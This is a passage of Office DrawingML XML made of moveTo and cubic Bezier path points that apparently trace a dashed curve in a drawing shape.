                    <a:pt x="1588" y="1995"/>
                    <a:pt x="1582" y="1998"/>
                    <a:pt x="1576" y="2001"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1574" y="2002"/>
                    <a:pt x="1573" y="2004"/>
                    <a:pt x="1574" y="2006"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1575" y="2008"/>
                    <a:pt x="1578" y="2009"/>
                    <a:pt x="1580" y="2008"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1586" y="2005"/>
                    <a:pt x="1592" y="2002"/>
                    <a:pt x="1597" y="1998"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1599" y="1997"/>
                    <a:pt x="1600" y="1995"/>
                    <a:pt x="1599" y="1993"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1598" y="1991"/>
                    <a:pt x="1595" y="1990"/>
                    <a:pt x="1593" y="1991"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1593" y="1991"/>
                    <a:pt x="1593" y="1991"/>
                    <a:pt x="1593" y="1991"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1628" y="1971"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1622" y="1974"/>
                    <a:pt x="1616" y="1978"/>
                    <a:pt x="1611" y="1981"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1609" y="1982"/>
                    <a:pt x="1608" y="1985"/>
                    <a:pt x="1609" y="1987"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1610" y="1989"/>
                    <a:pt x="1613" y="1989"/>
                    <a:pt x="1615" y="1988"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1620" y="1985"/>
                    <a:pt x="1626" y="1981"/>
                    <a:pt x="1632" y="1978"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1634" y="1977"/>
                    <a:pt x="1634" y="1974"/>
                    <a:pt x="1633" y="1972"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1632" y="1970"/>
                    <a:pt x="1630" y="1970"/>
                    <a:pt x="1628" y="1971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1628" y="1971"/>
                    <a:pt x="1628" y="1971"/>
                    <a:pt x="1628" y="1971"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1661" y="1949"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1656" y="1953"/>
                    <a:pt x="1650" y="1957"/>
                    <a:pt x="1644" y="1960"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1643" y="1961"/>
                    <a:pt x="1642" y="1964"/>
                    <a:pt x="1643" y="1966"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1644" y="1968"/>
                    <a:pt x="1647" y="1968"/>
                    <a:pt x="1649" y="1967"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1654" y="1963"/>
                    <a:pt x="1660" y="1960"/>
                    <a:pt x="1666" y="1956"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1667" y="1955"/>
                    <a:pt x="1668" y="1952"/>
                    <a:pt x="1667" y="1950"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1665" y="1949"/>
                    <a:pt x="1663" y="1948"/>
                    <a:pt x="1661" y="1949"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1694" y="1926"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1688" y="1930"/>
                    <a:pt x="1683" y="1934"/>
                    <a:pt x="1677" y="1938"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1676" y="1939"/>
                    <a:pt x="1675" y="1942"/>
                    <a:pt x="1677" y="1944"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1678" y="1945"/>
                    <a:pt x="1680" y="1946"/>
                    <a:pt x="1682" y="1945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1688" y="1941"/>
                    <a:pt x="1693" y="1937"/>
                    <a:pt x="1698" y="1933"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1700" y="1932"/>
                    <a:pt x="1701" y="1929"/>
                    <a:pt x="1699" y="1927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1698" y="1925"/>
                    <a:pt x="1695" y="1925"/>
                    <a:pt x="1694" y="1926"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1694" y="1926"/>
                    <a:pt x="1694" y="1926"/>
                    <a:pt x="1694" y="1926"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1725" y="1902"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1720" y="1906"/>
                    <a:pt x="1715" y="1910"/>
                    <a:pt x="1710" y="1914"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1708" y="1916"/>
                    <a:pt x="1708" y="1918"/>
                    <a:pt x="1709" y="1920"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1710" y="1922"/>
                    <a:pt x="1713" y="1922"/>
                    <a:pt x="1715" y="1921"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1720" y="1917"/>
                    <a:pt x="1725" y="1913"/>
                    <a:pt x="1730" y="1909"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1732" y="1907"/>
                    <a:pt x="1732" y="1905"/>
                    <a:pt x="1731" y="1903"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1730" y="1901"/>
                    <a:pt x="1727" y="1901"/>
                    <a:pt x="1725" y="1902"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1756" y="1877"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1751" y="1881"/>
                    <a:pt x="1746" y="1886"/>
                    <a:pt x="1741" y="1890"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1739" y="1891"/>
                    <a:pt x="1739" y="1894"/>
                    <a:pt x="1740" y="1895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1742" y="1897"/>
                    <a:pt x="1744" y="1897"/>
                    <a:pt x="1746" y="1896"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1751" y="1892"/>
                    <a:pt x="1756" y="1887"/>
                    <a:pt x="1761" y="1883"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1763" y="1882"/>
                    <a:pt x="1763" y="1879"/>
                    <a:pt x="1762" y="1877"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1760" y="1876"/>
                    <a:pt x="1758" y="1876"/>
                    <a:pt x="1756" y="1877"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1786" y="1851"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1781" y="1855"/>
                    <a:pt x="1776" y="1860"/>
                    <a:pt x="1771" y="1864"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1770" y="1865"/>
                    <a:pt x="1770" y="1868"/>
                    <a:pt x="1771" y="1870"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1772" y="1871"/>
                    <a:pt x="1775" y="1871"/>
                    <a:pt x="1777" y="1870"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1782" y="1865"/>
                    <a:pt x="1787" y="1861"/>
                    <a:pt x="1792" y="1856"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1793" y="1855"/>
                    <a:pt x="1793" y="1852"/>
                    <a:pt x="1792" y="1851"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1790" y="1849"/>
                    <a:pt x="1788" y="1849"/>
                    <a:pt x="1786" y="1851"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1786" y="1851"/>
                    <a:pt x="1786" y="1851"/>
                    <a:pt x="1786" y="1851"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1815" y="1823"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1810" y="1828"/>
                    <a:pt x="1806" y="1832"/>
                    <a:pt x="1801" y="1837"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1799" y="1838"/>
                    <a:pt x="1799" y="1841"/>
                    <a:pt x="1801" y="1843"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1802" y="1844"/>
                    <a:pt x="1805" y="1844"/>
                    <a:pt x="1806" y="1843"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1811" y="1838"/>
                    <a:pt x="1816" y="1833"/>
                    <a:pt x="1821" y="1829"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1822" y="1827"/>
                    <a:pt x="1822" y="1825"/>
                    <a:pt x="1821" y="1823"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1819" y="1822"/>
                    <a:pt x="1817" y="1822"/>
                    <a:pt x="1815" y="1823"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1843" y="1794"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1838" y="1799"/>
                    <a:pt x="1834" y="1804"/>
                    <a:pt x="1829" y="1809"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1828" y="1810"/>
                    <a:pt x="1828" y="1813"/>
                    <a:pt x="1829" y="1815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1831" y="1816"/>
                    <a:pt x="1833" y="1816"/>
                    <a:pt x="1835" y="1814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1839" y="1810"/>
                    <a:pt x="1844" y="1805"/>
                    <a:pt x="1849" y="1800"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1850" y="1798"/>
                    <a:pt x="1850" y="1796"/>
                    <a:pt x="1848" y="1794"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1847" y="1793"/>
                    <a:pt x="1844" y="1793"/>
                    <a:pt x="1843" y="1794"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1870" y="1765"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1865" y="1770"/>
                    <a:pt x="1861" y="1775"/>
                    <a:pt x="1856" y="1780"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1855" y="1781"/>
                    <a:pt x="1855" y="1784"/>
                    <a:pt x="1857" y="1785"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1858" y="1787"/>
                    <a:pt x="1861" y="1787"/>
                    <a:pt x="1862" y="1785"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1867" y="1780"/>
                    <a:pt x="1871" y="1775"/>
                    <a:pt x="1876" y="1770"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1877" y="1768"/>
                    <a:pt x="1877" y="1766"/>
                    <a:pt x="1875" y="1764"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1874" y="1763"/>
                    <a:pt x="1871" y="1763"/>
                    <a:pt x="1870" y="1765"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1895" y="1734"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1891" y="1739"/>
                    <a:pt x="1887" y="1745"/>
                    <a:pt x="1883" y="1750"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1881" y="1751"/>
                    <a:pt x="1881" y="1754"/>
                    <a:pt x="1883" y="1755"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1885" y="1757"/>
                    <a:pt x="1887" y="1757"/>
                    <a:pt x="1889" y="1755"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1893" y="1750"/>
                    <a:pt x="1897" y="1745"/>
                    <a:pt x="1901" y="1739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1903" y="1738"/>
                    <a:pt x="1903" y="1735"/>
                    <a:pt x="1901" y="1734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1899" y="1732"/>
                    <a:pt x="1897" y="1733"/>
                    <a:pt x="1895" y="1734"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1920" y="1703"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1916" y="1708"/>
                    <a:pt x="1912" y="1713"/>
                    <a:pt x="1908" y="1719"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1906" y="1720"/>
                    <a:pt x="1907" y="1723"/>
                    <a:pt x="1908" y="1724"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1910" y="1726"/>
                    <a:pt x="1913" y="1725"/>
                    <a:pt x="1914" y="1724"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1918" y="1718"/>
                    <a:pt x="1922" y="1713"/>
                    <a:pt x="1926" y="1707"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1927" y="1706"/>
                    <a:pt x="1927" y="1703"/>
                    <a:pt x="1925" y="1702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1924" y="1701"/>
                    <a:pt x="1921" y="1701"/>
                    <a:pt x="1920" y="1703"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1920" y="1703"/>
                    <a:pt x="1920" y="1703"/>
                    <a:pt x="1920" y="1703"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1943" y="1670"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1939" y="1676"/>
                    <a:pt x="1935" y="1681"/>
                    <a:pt x="1931" y="1687"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1930" y="1688"/>
                    <a:pt x="1931" y="1691"/>
                    <a:pt x="1932" y="1692"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1934" y="1693"/>
                    <a:pt x="1937" y="1693"/>
                    <a:pt x="1938" y="1691"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1942" y="1686"/>
                    <a:pt x="1946" y="1680"/>
                    <a:pt x="1950" y="1675"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1951" y="1673"/>
                    <a:pt x="1950" y="1670"/>
                    <a:pt x="1949" y="1669"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1947" y="1668"/>
                    <a:pt x="1944" y="1668"/>
                    <a:pt x="1943" y="1670"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1965" y="1637"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1961" y="1643"/>
                    <a:pt x="1958" y="1648"/>
                    <a:pt x="1954" y="1654"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1953" y="1656"/>
                    <a:pt x="1953" y="1658"/>
                    <a:pt x="1955" y="1659"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1957" y="1660"/>
                    <a:pt x="1960" y="1660"/>
                    <a:pt x="1961" y="1658"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1965" y="1653"/>
                    <a:pt x="1968" y="1647"/>
                    <a:pt x="1972" y="1641"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1973" y="1639"/>
                    <a:pt x="1972" y="1637"/>
                    <a:pt x="1971" y="1636"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1969" y="1635"/>
                    <a:pt x="1966" y="1635"/>
                    <a:pt x="1965" y="1637"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="1986" y="1603"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1982" y="1609"/>
                    <a:pt x="1979" y="1614"/>
                    <a:pt x="1976" y="1620"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1974" y="1622"/>
                    <a:pt x="1975" y="1624"/>
                    <a:pt x="1977" y="1625"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1979" y="1627"/>
                    <a:pt x="1981" y="1626"/>
                    <a:pt x="1982" y="1624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1986" y="1618"/>
                    <a:pt x="1989" y="1613"/>
                    <a:pt x="1993" y="1607"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1994" y="1605"/>
                    <a:pt x="1993" y="1602"/>
                    <a:pt x="1991" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1989" y="1600"/>
                    <a:pt x="1987" y="1601"/>
                    <a:pt x="1986" y="1603"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2005" y="1568"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2002" y="1574"/>
                    <a:pt x="1999" y="1580"/>
                    <a:pt x="1996" y="1585"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1995" y="1587"/>
                    <a:pt x="1995" y="1590"/>
                    <a:pt x="1997" y="1591"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1999" y="1592"/>
                    <a:pt x="2002" y="1591"/>
                    <a:pt x="2003" y="1589"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2006" y="1583"/>
                    <a:pt x="2009" y="1578"/>
                    <a:pt x="2012" y="1572"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2013" y="1570"/>
                    <a:pt x="2013" y="1567"/>
                    <a:pt x="2011" y="1566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2009" y="1565"/>
                    <a:pt x="2006" y="1566"/>
                    <a:pt x="2005" y="1568"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2005" y="1568"/>
                    <a:pt x="2005" y="1568"/>
                    <a:pt x="2005" y="1568"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2023" y="1532"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2021" y="1538"/>
                    <a:pt x="2018" y="1544"/>
                    <a:pt x="2015" y="1550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2014" y="1552"/>
                    <a:pt x="2014" y="1555"/>
                    <a:pt x="2016" y="1556"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2018" y="1557"/>
                    <a:pt x="2021" y="1556"/>
                    <a:pt x="2022" y="1554"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2025" y="1548"/>
                    <a:pt x="2028" y="1542"/>
                    <a:pt x="2031" y="1536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2032" y="1534"/>
                    <a:pt x="2031" y="1531"/>
                    <a:pt x="2029" y="1530"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2027" y="1529"/>
                    <a:pt x="2024" y="1530"/>
                    <a:pt x="2023" y="1532"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2023" y="1532"/>
                    <a:pt x="2023" y="1532"/>
                    <a:pt x="2023" y="1532"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2040" y="1496"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2038" y="1502"/>
                    <a:pt x="2035" y="1508"/>
                    <a:pt x="2032" y="1514"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2031" y="1516"/>
                    <a:pt x="2032" y="1519"/>
                    <a:pt x="2034" y="1520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2036" y="1520"/>
                    <a:pt x="2038" y="1520"/>
                    <a:pt x="2039" y="1518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2042" y="1511"/>
                    <a:pt x="2045" y="1505"/>
                    <a:pt x="2048" y="1499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2048" y="1497"/>
                    <a:pt x="2048" y="1495"/>
                    <a:pt x="2046" y="1494"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2044" y="1493"/>
                    <a:pt x="2041" y="1494"/>
                    <a:pt x="2040" y="1496"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2056" y="1459"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2053" y="1465"/>
                    <a:pt x="2051" y="1471"/>
                    <a:pt x="2048" y="1478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2047" y="1480"/>
                    <a:pt x="2048" y="1482"/>
                    <a:pt x="2050" y="1483"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2052" y="1484"/>
                    <a:pt x="2055" y="1483"/>
                    <a:pt x="2056" y="1481"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2058" y="1474"/>
                    <a:pt x="2061" y="1468"/>
                    <a:pt x="2063" y="1462"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2064" y="1460"/>
                    <a:pt x="2063" y="1458"/>
                    <a:pt x="2061" y="1457"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2059" y="1456"/>
                    <a:pt x="2057" y="1457"/>
                    <a:pt x="2056" y="1459"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2056" y="1459"/>
                    <a:pt x="2056" y="1459"/>
                    <a:pt x="2056" y="1459"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2070" y="1422"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2068" y="1428"/>
                    <a:pt x="2065" y="1434"/>
                    <a:pt x="2063" y="1440"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2062" y="1442"/>
                    <a:pt x="2063" y="1445"/>
                    <a:pt x="2065" y="1446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2067" y="1446"/>
                    <a:pt x="2070" y="1445"/>
                    <a:pt x="2070" y="1443"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2073" y="1437"/>
                    <a:pt x="2075" y="1431"/>
                    <a:pt x="2077" y="1424"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2078" y="1422"/>
                    <a:pt x="2077" y="1420"/>
                    <a:pt x="2075" y="1419"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2073" y="1418"/>
                    <a:pt x="2070" y="1419"/>
                    <a:pt x="2070" y="1422"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2082" y="1384"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2080" y="1390"/>
                    <a:pt x="2078" y="1396"/>
                    <a:pt x="2076" y="1403"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2076" y="1405"/>
                    <a:pt x="2077" y="1407"/>
                    <a:pt x="2079" y="1408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2081" y="1408"/>
                    <a:pt x="2083" y="1407"/>
                    <a:pt x="2084" y="1405"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2086" y="1399"/>
                    <a:pt x="2088" y="1392"/>
                    <a:pt x="2090" y="1386"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2091" y="1384"/>
                    <a:pt x="2089" y="1382"/>
                    <a:pt x="2087" y="1381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2085" y="1380"/>
                    <a:pt x="2083" y="1381"/>
                    <a:pt x="2082" y="1384"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2093" y="1345"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2092" y="1352"/>
                    <a:pt x="2090" y="1358"/>
                    <a:pt x="2088" y="1364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2087" y="1367"/>
                    <a:pt x="2089" y="1369"/>
                    <a:pt x="2091" y="1369"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2093" y="1370"/>
                    <a:pt x="2095" y="1369"/>
                    <a:pt x="2096" y="1367"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2098" y="1360"/>
                    <a:pt x="2099" y="1354"/>
                    <a:pt x="2101" y="1347"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2102" y="1345"/>
                    <a:pt x="2100" y="1343"/>
                    <a:pt x="2098" y="1342"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2096" y="1342"/>
                    <a:pt x="2094" y="1343"/>
                    <a:pt x="2093" y="1345"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2093" y="1345"/>
                    <a:pt x="2093" y="1345"/>
                    <a:pt x="2093" y="1345"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2103" y="1306"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2102" y="1313"/>
                    <a:pt x="2100" y="1319"/>
                    <a:pt x="2098" y="1326"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2098" y="1328"/>
                    <a:pt x="2099" y="1330"/>
                    <a:pt x="2101" y="1331"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2103" y="1331"/>
                    <a:pt x="2106" y="1330"/>
                    <a:pt x="2106" y="1328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2108" y="1321"/>
                    <a:pt x="2109" y="1315"/>
                    <a:pt x="2111" y="1308"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2111" y="1306"/>
                    <a:pt x="2110" y="1304"/>
                    <a:pt x="2108" y="1303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2106" y="1303"/>
                    <a:pt x="2104" y="1304"/>
                    <a:pt x="2103" y="1306"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2111" y="1267"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2110" y="1274"/>
                    <a:pt x="2109" y="1280"/>
                    <a:pt x="2107" y="1287"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2107" y="1289"/>
                    <a:pt x="2108" y="1291"/>
                    <a:pt x="2110" y="1292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2113" y="1292"/>
                    <a:pt x="2115" y="1291"/>
                    <a:pt x="2115" y="1289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2116" y="1282"/>
                    <a:pt x="2118" y="1275"/>
                    <a:pt x="2119" y="1269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2119" y="1267"/>
                    <a:pt x="2118" y="1265"/>
                    <a:pt x="2116" y="1264"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2114" y="1264"/>
                    <a:pt x="2112" y="1265"/>
                    <a:pt x="2111" y="1267"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="2118" y="1228"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2117" y="1235"/>
                    <a:pt x="2116" y="1241"/>
                    <a:pt x="2115" y="1248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2114" y="1250"/>
                    <a:pt x="2116" y="1252"/>
                    <a:pt x="2118" y="1252"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="1253"/>
                    <a:pt x="2122" y="1251"/>
                    <a:pt x="2123" y="1249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2124" y="1242"/>
                    <a:pt x="2125" y="1236"/>
                    <a:pt x="2126" y="1229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2126" y="1227"/>
                    <a:pt x="2125" y="1225"/>
                    <a:pt x="2122" y="1225"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2120" y="1224"/>
                    <a:pt x="2118" y="1226"/>
                    <a:pt x="2118" y="1228"/>
                  </a:cubicBezTo>
                  <a:moveTo>
